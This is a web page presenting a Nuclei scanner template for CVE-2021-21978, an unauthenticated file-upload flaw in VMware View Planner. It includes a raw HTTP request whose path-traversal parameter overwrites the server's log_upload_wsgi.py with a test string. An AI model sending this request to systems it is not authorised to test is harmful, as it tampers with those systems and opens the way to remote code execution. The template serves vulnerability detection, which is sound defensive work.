Skip to content

VMware View Planner <4.6 SP1- Remote Code Execution

ID: CVE-2021-21978

Severity: critical

Author: dwisiswant0

Tags: cve2021,cve,vmware,rce,packetstorm,fileupload,intrusive

VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.An unauthorized attacker with network access to View Planner Harness could upload and execute a specially craftedfile leading to remote code execution within the logupload container.

id: CVE-2021-21978
info:
name: VMware View Planner <4.6 SP1- Remote Code Execution
author: dwisiswant0
severity: critical
description: |
VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.
An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted
file leading to remote code execution within the logupload container.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Upgrade to VMware View Planner version 4.6 SP1 or later to mitigate this vulnerability.
reference:
- https://twitter.com/osama_hroot/status/1367258907601698816
- https://nvd.nist.gov/vuln/detail/CVE-2021-21978
- https://www.vmware.com/security/advisories/VMSA-2021-0003.html
- http://packetstormsecurity.com/files/161879/VMware-View-Planner-4.6-Remote-Code-Execution.html
- https://github.com/HimmelAward/Goby_POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-21978
cwe-id: CWE-20
epss-score: 0.97475
epss-percentile: 0.99967
cpe: cpe:2.3:a:vmware:view_planner:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: vmware
product: view_planner
tags: cve2021,cve,vmware,rce,packetstorm,fileupload,intrusive
http:
- raw:
- |
POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
Accept: text/html
Referer: {{BaseURL}}
Connection: close
------WebKitFormBoundarySHHbUsfCoxlX1bpS
Content-Disposition: form-data; name="logfile"; filename=""
Content-Type: text/plain
POC_TEST
------WebKitFormBoundarySHHbUsfCoxlX1bpS
matchers-condition: and
matchers:
- type: dsl
dsl:
- "len(body) == 28"
- type: word
part: body
words:
- "File uploaded successfully."
- type: status
status:
- 200
# digest: 490a0046304402201bc329123f0c512104b7e01f985b54281d5d49cf66e4689293018bb6cbc2f81c0220745fe525c65964954b65236b928b5c4cd3c29d2456d865d39782589bee350afc:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-21978.yaml"

View on Github